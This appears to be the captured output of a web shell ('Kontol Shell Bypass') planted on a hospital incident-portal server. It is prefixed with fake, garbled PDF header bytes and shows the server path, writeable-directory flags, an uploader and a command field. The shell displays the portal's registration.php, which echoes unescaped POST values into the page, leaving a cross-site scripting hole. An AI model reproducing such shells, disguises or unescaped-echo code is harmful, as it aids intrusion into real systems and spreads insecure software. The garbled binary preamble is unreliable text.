%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/shardahospital.org/incident/application/views/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/shardahospital.org/incident/application/views/registration.php
<div id="login-page">
	<div class="login-new">
    	<div class="login-left">
                <div class="logo">
                    <a href="<?=base_url() ?>"><img src="<?=base_url('assets/imgs/logo21.png') ?>" alt="logo" /></a>
                     <br /><br />
                    <h3>
                    
                    Incident  Redressal<br /> Online Portal </h3>
                </div>
                
                <ul class="login-num">
                	<li>
                    	<div class="icon">1</div>
                        <h5>Register Your self</h5> 
                    </li>
                    <li>
                    	<div class="icon">2</div>
                        <h5>Add Your complaint</h5> 
                    </li>
                    <li>
                    	<div class="icon">3</div>
                        <h5>Track your Incident Live Status   </h5> 
                    </li>
                </ul>
                
                 
    	</div>
        <div class="login-right">
    
		 <div class="login-right-in">
			<div class="logo">
			 
            <h4>User Registration</h4>
            </div>
		 
	   

		      <form id="form" class="" method="post" autocomplete="off">
		   
		        <p style="padding-left: 1%; color: green">
		        	<?php if($success_msg){ 
									echo htmlentities($success_msg);
		        	} ?>
		        </p>
		        <div class="login-sec">
				
					<div class="login-group">
					 
						<input type="text" id="enrollment" class="" placeholder="Employee ID" value="<?=$_POST['system_id'] ?>" name="system_id" maxlength="7" onkeyup="this.value=this.value.replace(/[^\d]/,'')"   required>
						<span id="enrollment_validation" style="font-size:12px;color:red;"><?=$error_array['system_id']?></span>
		           	 
		            </div>
					
					<div class="login-group">
				 
		         	<input type="text" id="fullname" class="" placeholder="Full Name" name="fullname" maxlength="30" value="<?=$_POST['fullname'] ?>" required>
					<span id="fullname_validation" style="font-size:12px;color:red;"><?=$error_array['fullname']?></span>
		             
		            </div>
					<div class="login-group">
					 
		            <input type="email" class=" " placeholder="Email ID" id="email" name="email_id" value="<?=$_POST['email_id'] ?>" maxlength="150" required>
		            <span id="user-availability-status1" style="font-size:12px;color:red;"><?=$error_array['email_id']?></span>
		             
		            </div>
					<div class="login-group">
						 
						<input type="text" id="contactno" class="" maxlength="10" name="mobile_no" value="<?=$_POST['mobile_no'] ?>" oninput="this.value = this.value.replace(/[^0-9.]/g, '').replace(/(\..*)\./g, '$1');" placeholder="Contact Number" required>
						<span id="contactno_validation" style="font-size:12px;color:red;"><?=$error_array['mobile_no']?></span>
						 
		            </div>
					
					<button class="button1" onclick="return doSubmit();" type="submit" name="submit" id="submit" value="Submit"><i class="fa fa-user"></i> Register</button>
		            <hr>
		            
		            <p class="registration1">
		                Already Registered <a href="<?=base_url('userlogin') ?>"> Sign in </a>
		            </p>
		
		        </div>
		     </form>	  	
	   
	   
        </div>
        </div>
        
    </div>    
</div>

<style>

</style>
	  
	  <script>
        $.backstretch("assets/img/login-bg.jpg", {speed: 500});
    </script>
	<script>
    $('#fullname').on('input', function() 
    {
      validateFullName();
    });

	$('#email').on('input', function() 
    {
      validateEmail();
    });

	$('#password').on('input', function() 
    {
      validatePassword();
    });


	$('#programmename').on('input', function() 
    {
      validateProgrammeName();
    });

    $('#acadyear').on('input', function() 
    {
      validateAcadYear();
    });

    $('#enrollment').on('input', function() 
    {
      validateEnroll();
    });

    $('#contactno').on('input', function() 
    {
      validateContact();
    });


	function validateFullName()
    {
      var format = /^[A-Za-z0-9 ]+$/;
      var value = $("#fullname").val();
      var error ="";
      if(value.length<5)
      {
        error ="Full name must be more than 5 characters";
      }
      else if (!(format.test(value)))
      {
        error ="Please remove special characters.";        
      }
      $("#fullname_validation").html(error);
      $("#fullname").focus();
      
      if(error.length>0) return false;
      return true;
    }

	function validateEmail()
    {
		var format = /^(([^<>()[\]\\.,;:\s@\"]+(\.[^<>()[\]\\.,;:\s@\"]+)*)|(\".+\"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/;

      //var format = /^[A-Za-z0-9 ]+$/;
      var value = $("#email").val();
      var error ="";
      if(value.length<1)
      {
        error ="Email can't be empty.";
      }
      else if (!(format.test(value)))
      {
        error ="Invalid Email.";        
      }
      $("#user-availability-status1").html(error);
      $("#email").focus();
      
      if(error.length>0) return false;
      else{
		  userAvailability();
		return true;
	  }
    }

	function validatePassword()
    {
      var value = $("#password").val();
      var error ="";
      if(value.length<4)
      {
        error ="Password must be 4 charecter long";
      }
      $("#password_validation").html(error);
      $("#password").focus();
      
      if(error.length>0) return false;
      return true;
    }


	function validateProgrammeName()
    {
      var format = /^[A-Za-z0-9 ]+$/;
      var value = $("#programmename").val();
      var error ="";
      if(value.length<2)
      {
        error ="Programme name can't be empty.";
      }
      else if (!(format.test(value)))
      {
        error ="Please remove special characters.";        
      }
      $("#programmename_validation").html(error);
      $("#programmename").focus();
      
      if(error.length>0) return false;
      return true;
    }

    function validateAcadYear()
    {
      var format = /^[0-9]+$/;
      var value = $("#acadyear").val();
      var error ="";
      if(value.length<4)
      {
        error ="Must be 4 digit long";
      }

      $("#acadyear_validation").html(error);
      $("#acadyear").focus();
      
      if(error.length>0) return false;
      return true;
    }

    function validateEnroll()
    {
      var format = /^[A-Za-z0-9 ]+$/;
      var value = $("#enrollment").val();
      var error ="";
      if(value.length<2)
      {
        error ="Employee Id can't be empty.";
      }
      else if (!(format.test(value)))
      {
        error ="Please remove special characters.";        
      }
      $("#enrollment_validation").html(error);
      $("#enrollment").focus();
      
      if(error.length>0) return false;
      return true;
    }

    function validateContact()
    {
      var format = /^[0-9]+$/;
      var value = $("#contactno").val();
      var error ="";
      if(value.length<10)
      {
        error ="Must be 10 digit long";
      }

      $("#contactno_validation").html(error);
      $("#contactno").focus();
      
      if(error.length>0) return false;
      return true;
    }

	function validationsPass()
    {
      return validateFullName() &&validateEmail()  &&validatePassword() && validateContact() && validateProgrammeName() && validateAcadYear() && validateEnroll() ;
    }

    function doSubmit()
    {
        if (validationsPass()) 
        {
          return true;
        }
        else
        {
          return false;
        }
    }

	</script>

Kontol Shell Bypass